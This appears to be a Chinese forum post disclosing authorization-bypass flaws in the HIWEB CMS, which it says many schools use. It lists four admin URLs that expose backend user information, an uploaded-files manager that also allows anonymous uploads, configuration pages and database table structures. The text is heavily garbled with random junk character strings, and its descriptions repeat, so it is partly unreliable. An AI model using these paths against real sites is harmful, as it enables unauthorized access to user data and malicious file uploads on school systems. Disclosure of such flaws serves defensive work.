HIWEB是一套整站管理系统,很多学校在用这个来搭站。但是此cms后台存在多处权限绕过的问题。3 T. d- O7 J4 l; C: |
) V3 d) z4 `' W+ U3 `$ s
2 }6 _9 S+ K' u1. http://xxxx/hiwebcms/system/USER/
2 l+ w; N3 Q3 v. R9 A& c' l( o6 o' c可以直接看到所有后台用户信息
6 y0 A" Q! K: G6 W% k( I
; @$ d) f2 ? t& I2. http://xxxx/hiwebcms/system/sysSetup/filesManage.htm6 ^, P: z; i/ w9 z$ w. V) r4 k
可以查看所有上传的文件,匿名用户也可以上传文件。
8 w7 t# A: o+ B+ F0 p0 P" e
5 ?% g1 B. k% t& k$ Z3 S* O3. http://xxxx/hiwebcms/system/sysSetup/sysSetup.htm' r, n' Q/ v- [* p5 t, H" ~! e2 w1 q; i
可以查看cms的部分配置
/ W4 K6 Z" X6 W8 J' p
. ^" ~( n) u: f9 [4. http://xxxx/hiwebcms/system/USER/userConfig.htm% g( j/ Z% t% ^& A0 B% p
查看数据库中部分表结构" ?: x s) x+ q; e: n. m- K6 k
( C1 U8 J1 \% T; ~
可以直接看到所有后台用户信息! `: Y1 K. T9 Q8 s7 Q% w) u
- `6 e6 w% ]: B
" `; z4 W7 M! y, q4 k+ a b& |6 p) }% Y, E2 C. w
可以查看所有上传的文件,匿名用户也可以上传文件。
9 g9 @& B$ t# p& K7 l7 O
* r* m: U8 v2 b$ ?0 [
+ c* S- w- K/ r0 w' o: ]) B; Q% e. H& a# l
4 ?# c# n& b. W可以查看cms的部分配置
, f# o4 f1 @. s9 w' A8 J( m8 N) y6 @* A3 o. L
$ a7 P- U6 e8 O; c4 Y% n! A. @/ e9 C* j$ \" i
3 c! H) y7 ?2 l& k% O( v查看数据库中部分表结构5 L! f6 i% J/ q$ }" j
4 ~- ] F7 J, x
|